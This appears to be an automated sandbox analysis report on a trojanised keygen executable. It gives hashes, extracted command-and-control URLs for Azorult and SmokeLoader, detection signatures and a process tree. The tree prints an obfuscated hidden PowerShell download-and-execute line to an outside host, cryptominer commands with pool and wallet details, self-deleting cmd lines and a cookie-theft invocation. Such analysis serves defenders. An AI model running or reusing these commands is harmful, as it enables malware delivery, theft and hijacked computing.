Analysis
-
max time kernel
300s -
max time network
300s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
02-04-2021 20:55
Static task
static1
Behavioral task
behavioral1
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
Behavioral task
behavioral3
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
Behavioral task
behavioral4
Sample
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
Resource
win10v20201028
General
-
Target
Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe
-
Size
5.4MB
-
MD5
b401dc45a17f4b2acf6f9cf7141683c8
-
SHA1
10a6c5c6dec6ea11f9512e20cc655d53efdb3302
-
SHA256
45fde52ed17c4165995ac279c880225f5725a83c0426dc57886fbabde8dae637
-
SHA512
9f2b2049589a06b678ee4672bc6b493be4ac4a783d8b450830a100c439e90ba7bf4e81fff51bc46800a59365f8447cc31f19e1f2d4a22a0b4983ae56fec9f7d8
Malware Config
Extracted
http://labsclub.com/welcome
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
resource yara_rule behavioral2/memory/5500-235-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba behavioral2/memory/5500-236-0x0000000005080000-0x000000000598A000-memory.dmp family_glupteba behavioral2/memory/5500-239-0x0000000000400000-0x0000000000D24000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
XMRig Miner Payload 8 IoCs
resource yara_rule behavioral2/memory/5916-225-0x00000001402CA898-mapping.dmp xmrig behavioral2/memory/5916-222-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5916-233-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/5916-257-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/8792-788-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6420-803-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/8792-970-0x0000000140000000-0x000000014070A000-memory.dmp xmrig behavioral2/memory/6420-988-0x0000000140000000-0x000000014070A000-memory.dmp xmrig -
Executes dropped EXE 11 IoCs
pid Process 3220 keygen-pr.exe 3224 keygen-step-1.exe 1124 keygen-step-3.exe 652 keygen-step-4.exe 3784 key.exe 492 Setup.exe 1404 key.exe 908 multitimer.exe 1300 setups.exe 3084 askinstall20.exe 1456 setups.tmp -
Loads dropped DLL 7 IoCs
pid Process 1456 setups.tmp 1456 setups.tmp 1456 setups.tmp 1456 setups.tmp 1456 setups.tmp 1456 setups.tmp 1456 setups.tmp -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 12 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 559 ipinfo.io 567 ipinfo.io 141 ipinfo.io 143 ipinfo.io 290 ipinfo.io 359 ip-api.com 546 ipinfo.io 555 ipinfo.io 121 api.ipify.org 182 ip-api.com 284 ipinfo.io 439 api.ipify.org -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3784 set thread context of 1404 3784 key.exe 90 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 42 IoCs
pid pid_target Process procid_target 5576 5276 WerFault.exe 124 4280 5276 WerFault.exe 124 5552 5276 WerFault.exe 124 5876 5276 WerFault.exe 124 6288 5276 WerFault.exe 124 6228 5276 WerFault.exe 124 5188 5276 WerFault.exe 124 7480 4852 WerFault.exe 235 7932 4852 WerFault.exe 235 6952 4852 WerFault.exe 235 7536 4852 WerFault.exe 235 6068 4852 WerFault.exe 235 7908 4852 WerFault.exe 235 1984 4852 WerFault.exe 235 6980 6472 WerFault.exe 179 3656 6472 WerFault.exe 179 2784 6472 WerFault.exe 179 2480 5608 WerFault.exe 149 2952 6472 WerFault.exe 179 8044 6472 WerFault.exe 179 7840 6472 WerFault.exe 179 3144 6472 WerFault.exe 179 4004 6472 WerFault.exe 179 3384 6472 WerFault.exe 179 9116 6472 WerFault.exe 179 8384 6472 WerFault.exe 179 8712 6472 WerFault.exe 179 9152 6472 WerFault.exe 179 7300 7696 WerFault.exe 403 8200 6472 WerFault.exe 179 7880 8540 WerFault.exe 409 7460 7696 WerFault.exe 403 5716 8540 WerFault.exe 409 7668 7696 WerFault.exe 403 5924 8540 WerFault.exe 409 7176 5908 WerFault.exe 450 6100 8540 WerFault.exe 409 5800 7696 WerFault.exe 403 7968 8540 WerFault.exe 409 9184 7696 WerFault.exe 403 8592 8540 WerFault.exe 409 8920 8540 WerFault.exe 409 -
Delays execution with timeout.exe 1 IoCs
pid Process 6692 timeout.exe -
Kills process with taskkill 4 IoCs
pid Process 4332 taskkill.exe 3040 taskkill.exe 3592 taskkill.exe 3260 taskkill.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 6016 PING.EXE 5788 PING.EXE 6040 PING.EXE 8316 PING.EXE 2244 PING.EXE 804 PING.EXE -
Script User-Agent 12 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 286 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 545 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 553 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 558 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 564 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 565 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 142 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 146 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 297 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 552 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 563 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 570 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1456 setups.tmp 1456 setups.tmp -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 492 Setup.exe Token: SeCreateTokenPrivilege 3084 askinstall20.exe Token: SeAssignPrimaryTokenPrivilege 3084 askinstall20.exe Token: SeLockMemoryPrivilege 3084 askinstall20.exe Token: SeIncreaseQuotaPrivilege 3084 askinstall20.exe Token: SeMachineAccountPrivilege 3084 askinstall20.exe Token: SeTcbPrivilege 3084 askinstall20.exe Token: SeSecurityPrivilege 3084 askinstall20.exe Token: SeTakeOwnershipPrivilege 3084 askinstall20.exe Token: SeLoadDriverPrivilege 3084 askinstall20.exe Token: SeSystemProfilePrivilege 3084 askinstall20.exe Token: SeSystemtimePrivilege 3084 askinstall20.exe Token: SeProfSingleProcessPrivilege 3084 askinstall20.exe Token: SeIncBasePriorityPrivilege 3084 askinstall20.exe Token: SeCreatePagefilePrivilege 3084 askinstall20.exe Token: SeCreatePermanentPrivilege 3084 askinstall20.exe Token: SeBackupPrivilege 3084 askinstall20.exe Token: SeRestorePrivilege 3084 askinstall20.exe Token: SeShutdownPrivilege 3084 askinstall20.exe Token: SeDebugPrivilege 3084 askinstall20.exe Token: SeAuditPrivilege 3084 askinstall20.exe Token: SeSystemEnvironmentPrivilege 3084 askinstall20.exe Token: SeChangeNotifyPrivilege 3084 askinstall20.exe Token: SeRemoteShutdownPrivilege 3084 askinstall20.exe Token: SeUndockPrivilege 3084 askinstall20.exe Token: SeSyncAgentPrivilege 3084 askinstall20.exe Token: SeEnableDelegationPrivilege 3084 askinstall20.exe Token: SeManageVolumePrivilege 3084 askinstall20.exe Token: SeImpersonatePrivilege 3084 askinstall20.exe Token: SeCreateGlobalPrivilege 3084 askinstall20.exe Token: 31 3084 askinstall20.exe Token: 32 3084 askinstall20.exe Token: 33 3084 askinstall20.exe Token: 34 3084 askinstall20.exe Token: 35 3084 askinstall20.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1300 setups.exe 1456 setups.tmp -
Suspicious use of WriteProcessMemory 52 IoCs
description pid Process procid_target PID 1144 wrote to memory of 2012 1144 Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe 79 PID 1144 wrote to memory of 2012 1144 Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe 79 PID 1144 wrote to memory of 2012 1144 Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe 79 PID 2012 wrote to memory of 3220 2012 cmd.exe 82 PID 2012 wrote to memory of 3220 2012 cmd.exe 82 PID 2012 wrote to memory of 3220 2012 cmd.exe 82 PID 2012 wrote to memory of 3224 2012 cmd.exe 83 PID 2012 wrote to memory of 3224 2012 cmd.exe 83 PID 2012 wrote to memory of 3224 2012 cmd.exe 83 PID 2012 wrote to memory of 1124 2012 cmd.exe 84 PID 2012 wrote to memory of 1124 2012 cmd.exe 84 PID 2012 wrote to memory of 1124 2012 cmd.exe 84 PID 2012 wrote to memory of 652 2012 cmd.exe 85 PID 2012 wrote to memory of 652 2012 cmd.exe 85 PID 2012 wrote to memory of 652 2012 cmd.exe 85 PID 3220 wrote to memory of 3784 3220 keygen-pr.exe 86 PID 3220 wrote to memory of 3784 3220 keygen-pr.exe 86 PID 3220 wrote to memory of 3784 3220 keygen-pr.exe 86 PID 652 wrote to memory of 492 652 keygen-step-4.exe 87 PID 652 wrote to memory of 492 652 keygen-step-4.exe 87 PID 1124 wrote to memory of 2704 1124 keygen-step-3.exe 88 PID 1124 wrote to memory of 2704 1124 keygen-step-3.exe 88 PID 1124 wrote to memory of 2704 1124 keygen-step-3.exe 88 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 3784 wrote to memory of 1404 3784 key.exe 90 PID 2704 wrote to memory of 804 2704 cmd.exe 92 PID 2704 wrote to memory of 804 2704 cmd.exe 92 PID 2704 wrote to memory of 804 2704 cmd.exe 92 PID 492 wrote to memory of 908 492 Setup.exe 93 PID 492 wrote to memory of 908 492 Setup.exe 93 PID 492 wrote to memory of 1300 492 Setup.exe 94 PID 492 wrote to memory of 1300 492 Setup.exe 94 PID 492 wrote to memory of 1300 492 Setup.exe 94 PID 652 wrote to memory of 3084 652 keygen-step-4.exe 95 PID 652 wrote to memory of 3084 652 keygen-step-4.exe 95 PID 652 wrote to memory of 3084 652 keygen-step-4.exe 95 PID 1300 wrote to memory of 1456 1300 setups.exe 96 PID 1300 wrote to memory of 1456 1300 setups.exe 96 PID 1300 wrote to memory of 1456 1300 setups.exe 96
Processes
-
C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe"C:\Users\Admin\AppData\Local\Temp\Active_File_Recovery_Demo_all_serial_code_maker_by_DBC.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3220 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:1404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:3224
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1124 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:804
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:492 -
C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe" 0 3060197d33d91c80.94013368 0 1015⤵
- Executes dropped EXE
PID:908 -
C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe" 1 3.1617396956.606784dcde4bb 1016⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KU5SSK7FJ7\multitimer.exe" 2 3.1617396956.606784dcde4bb7⤵PID:4880
-
C:\Users\Admin\AppData\Local\Temp\mqaniqgbbji\ckwa5r5njh2.exe"C:\Users\Admin\AppData\Local\Temp\mqaniqgbbji\ckwa5r5njh2.exe" /ustwo INSTALL8⤵PID:5276
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 6529⤵
- Program crash
PID:5576
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 6689⤵
- Program crash
PID:4280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 7689⤵
- Program crash
PID:5552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 8169⤵
- Program crash
PID:5876
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 8769⤵
- Program crash
PID:6288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 9329⤵
- Program crash
PID:6228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 9689⤵
- Program crash
PID:5188
-
-
-
C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\xe4jl5w4xd0.exe"C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\xe4jl5w4xd0.exe" /quiet SILENT=1 AF=7568⤵PID:5808
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\xe4jl5w4xd0.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\qexhzwbbdg4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617137443 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:6296
-
-
-
C:\Users\Admin\AppData\Local\Temp\jsigpk3eda4\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\jsigpk3eda4\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5600
-
-
C:\Users\Admin\AppData\Local\Temp\higtnac13oq\vpn.exe"C:\Users\Admin\AppData\Local\Temp\higtnac13oq\vpn.exe" /silent /subid=4828⤵PID:5556
-
-
C:\Users\Admin\AppData\Local\Temp\jkc0a2z1cc2\app.exe"C:\Users\Admin\AppData\Local\Temp\jkc0a2z1cc2\app.exe" /8-238⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\r3vmr5djc5p\vict.exe"C:\Users\Admin\AppData\Local\Temp\r3vmr5djc5p\vict.exe" /VERYSILENT /id=5358⤵PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\rzhgdxaiw2m\shoigydc4q5.exe"C:\Users\Admin\AppData\Local\Temp\rzhgdxaiw2m\shoigydc4q5.exe"8⤵PID:5416
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rzhgdxaiw2m\shoigydc4q5.exe"9⤵PID:4504
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:5788
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4izeh0nvbjq\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\4izeh0nvbjq\Setup3310.exe" /Verysilent /subid=5778⤵PID:5368
-
-
C:\Users\Admin\AppData\Local\Temp\eapvx31f4ga\kdo1fvx5zev.exe"C:\Users\Admin\AppData\Local\Temp\eapvx31f4ga\kdo1fvx5zev.exe" /VERYSILENT8⤵PID:5264
-
-
C:\Users\Admin\AppData\Local\Temp\qz2ikaxrglk\KiffApp1.exe"C:\Users\Admin\AppData\Local\Temp\qz2ikaxrglk\KiffApp1.exe"8⤵PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\hadt23mtqf3\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\hadt23mtqf3\cpyrix.exe" /VERYSILENT8⤵PID:5232
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:6796
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:4956
-
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"10⤵PID:2160
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:6936
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"10⤵PID:7148
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub10⤵PID:2912
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe11⤵PID:4172
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\P6LNK3EOTT\setups.exe"C:\Users\Admin\AppData\Local\Temp\P6LNK3EOTT\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\is-7V7O1.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-7V7O1.tmp\setups.tmp" /SL5="$4011A,635399,250368,C:\Users\Admin\AppData\Local\Temp\P6LNK3EOTT\setups.exe" ll6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1456
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3084 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4236
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4332
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:5012
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:5108
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4268
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:2060
-
C:\Users\Admin\AppData\Roaming\A82C.tmp.exe"C:\Users\Admin\AppData\Roaming\A82C.tmp.exe"5⤵PID:4816
-
C:\Users\Admin\AppData\Roaming\A82C.tmp.exe"C:\Users\Admin\AppData\Roaming\A82C.tmp.exe"6⤵PID:5132
-
-
-
C:\Users\Admin\AppData\Roaming\A9C4.tmp.exe"C:\Users\Admin\AppData\Roaming\A9C4.tmp.exe"5⤵PID:2176
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:980
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5916
-
-
-
C:\Users\Admin\AppData\Roaming\AA61.tmp.exe"C:\Users\Admin\AppData\Roaming\AA61.tmp.exe"5⤵PID:5056
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AA61.tmp.exe6⤵PID:1232
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6692
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:1764
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:6016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:3808
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:7824
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:3280
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6528
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6884
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4352
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4420
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4716
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4868
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4320
-
C:\Users\Admin\AppData\Local\Temp\is-M9KLK.tmp\kdo1fvx5zev.tmp"C:\Users\Admin\AppData\Local\Temp\is-M9KLK.tmp\kdo1fvx5zev.tmp" /SL5="$901E8,2592217,780800,C:\Users\Admin\AppData\Local\Temp\eapvx31f4ga\kdo1fvx5zev.exe" /VERYSILENT1⤵PID:5536
-
C:\Users\Admin\AppData\Local\Temp\is-D66FK.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-D66FK.tmp\winlthsth.exe"2⤵PID:5720
-
C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe"C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe"3⤵PID:6920
-
C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe"C:\Users\Admin\AppData\Local\Temp\CyHUdBm2f.exe"4⤵PID:7012
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:7648
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:5228
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-4OVVD.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-4OVVD.tmp\vict.tmp" /SL5="$401F8,870426,780800,C:\Users\Admin\AppData\Local\Temp\r3vmr5djc5p\vict.exe" /VERYSILENT /id=5351⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\is-COAT9.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-COAT9.tmp\win1host.exe" 5352⤵PID:5608
-
C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe"C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe"3⤵PID:6216
-
C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe"C:\Users\Admin\AppData\Local\Temp\zUTjNmzDy.exe"4⤵PID:7064
-
-
-
